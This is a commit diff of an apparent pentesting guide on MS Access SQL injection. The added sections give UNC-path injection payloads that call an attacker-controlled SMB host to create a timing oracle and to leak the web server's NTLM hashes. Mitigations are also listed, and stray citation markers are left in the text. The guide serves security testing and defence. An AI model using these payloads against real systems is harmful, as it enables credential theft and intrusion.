You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
@@ -127,9 +127,21 @@ IIF((select mid(last(username),1,1) from (select top 10 username from users))='a
127
127
128
128
In a nutshell, the query uses an “if-then” statement in order to trigger a “200 OK” in case of success or a “500 Internal Error” otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only. On such value, using the MID operator, it is possible to perform a simple character comparison. Properly changing the index of MID and TOP, we can dump the content of the “username” field for all rows.
Jet/ACE SQL itself does **not** expose a native `SLEEP()`or`WAITFOR` function, so traditional time-based blind injections are limited. However, you can still introduce a measurable delay by forcing the engine to access a **network resource that is slow or does not answer**. Because the engine will try to open the file before returning the result, the HTTP response time reflects the round-trip latency to the attacker-controlled host.
133
+
134
+
```sql
135
+
' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--
136
+
```
137
+
138
+
Point the UNC path to:
139
+
140
+
* a SMB share behind a high-latency link
141
+
* a host that drops the TCP handshake after `SYN-ACK`
142
+
* a firewall sinkhole
143
+
144
+
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
133
145
134
146
### Other Interesting functions
135
147
@@ -162,7 +174,7 @@ However, note that is very typical to find SQL Injections where you **don't have
162
174
163
175
The knowledge of the **web root absolute path may facilitate further attacks**. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.
Where **name\[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
197
+
Where **name[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
Since Jet 4.0 every query can reference a table located in a *different* `.mdb/.accdb` file via the `IN'<path>'` clause:
202
+
203
+
```sql
204
+
SELECT first_name FROM Employees IN'\\server\share\hr.accdb';
205
+
```
206
+
207
+
If user input is concatenated into the part after **IN** (or into a `JOIN … IN` / `OPENROWSET` / `OPENDATASOURCE` call) an attacker can specify a **UNC path** that points to a host they control. The engine will:
208
+
209
+
1. try to authenticate over SMB / HTTP to open the remote database;
210
+
2. leak the web-server’s **NTLM credentials** (forced authentication);
211
+
3. parse the remote file – a malformed or malicious database can trigger Jet/ACE memory-corruption bugs that have been patched multiple times (e.g. CVE-2021-28455).
212
+
213
+
Practical injection example:
214
+
215
+
```sql
216
+
1' UNION SELECT TOP 1 name
217
+
FROM MSysObjects
218
+
IN '\\attacker\share\poc.mdb'-- -
219
+
```
220
+
221
+
Impact:
222
+
223
+
* Out-of-band exfiltration of Net-NTLMv2 hashes (usable for relay or offline cracking).
224
+
* Potential remote code execution if a new Jet/ACE parser bug is exploited.
225
+
226
+
Mitigations (recommended even for legacy Classic ASP apps):
227
+
228
+
* Add the registry value `AllowQueryRemoteTables = 0` under `HKLM\Software\Microsoft\Jet\4.0\Engines` (and under the equivalent ACE path). This forces Jet/ACE to reject remote paths starting with `\\`.
229
+
* Block outbound SMB/WebDAV at the network boundary.
230
+
* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
231
+
232
+
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
186
233
187
234
### .mdb Password Cracker
188
235
@@ -191,8 +238,7 @@ Where **name\[i] is a .mdb filename** and **realTable is an existent table** wit
- [Microsoft KB5002984 – Configuring Jet/ACE to block remote tables](https://support.microsoft.com/en-gb/topic/kb5002984-configuring-jet-red-database-engine-and-access-connectivity-engine-to-block-access-to-remote-databases-56406821-30f3-475c-a492-208b9bd30544)
242
+
- [Check Point Research – Abusing Microsoft Access Linked Tables for NTLM Forced Authentication (2023)](https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/)
0 commit comments